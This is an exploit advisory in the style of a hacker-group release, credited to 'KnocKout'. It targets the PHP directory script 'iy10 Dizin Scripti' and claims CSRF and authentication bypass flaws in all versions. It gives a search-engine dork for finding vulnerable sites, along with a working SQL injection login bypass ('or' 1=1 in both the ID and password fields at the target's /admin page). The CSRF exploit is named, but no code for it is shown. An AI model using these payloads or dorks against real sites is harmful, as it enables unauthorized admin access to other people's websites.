.__ _____ _______ | |__ / | |___ __\ _ \_______ ____ | | \ / | |\ \/ / /_\ \_ __ \_/ __ \ | Y \/ ^ /> <\ \_/ \ | \/\ ___/ |___| /\____ |/__/\_ \\_____ /__| \___ > \/ |__| \/ \/ \/ _____________________________ / _____/\_ _____/\_ ___ \ \_____ \ | __)_ / \ \/ / \ | \\ \____ /_______ //_______ / \______ / \/ \/ \/ iy10 Dizin Scripti => Multiple Vulnerabilities (CSRF & Authentication Bypass) ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockout@e-mail.com.tr [~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com [~] Şeker Insanlar : ZoRLu, ( milw00rm.com ), Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, DaiMon KedAns-Dz, b3mb4m ########################################################### ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : iy10 Dizin Scripti |~Affected Version : All Version |~Software : http://wmscripti.com/php-scriptler/iy10-dizin-scripti.html |~RISK : High |~Google Keyword : "Sitenizi dizine eklemek için tıklayın !" ################## ++ CSRF Admin Password Change Exploit ++ ######################################
################# ++ SQL Injection with Authentication Bypass ++########################################### http://[TARGET]/admin ID: 'or' 1=1 PW : 'or' 1=1 ############################################################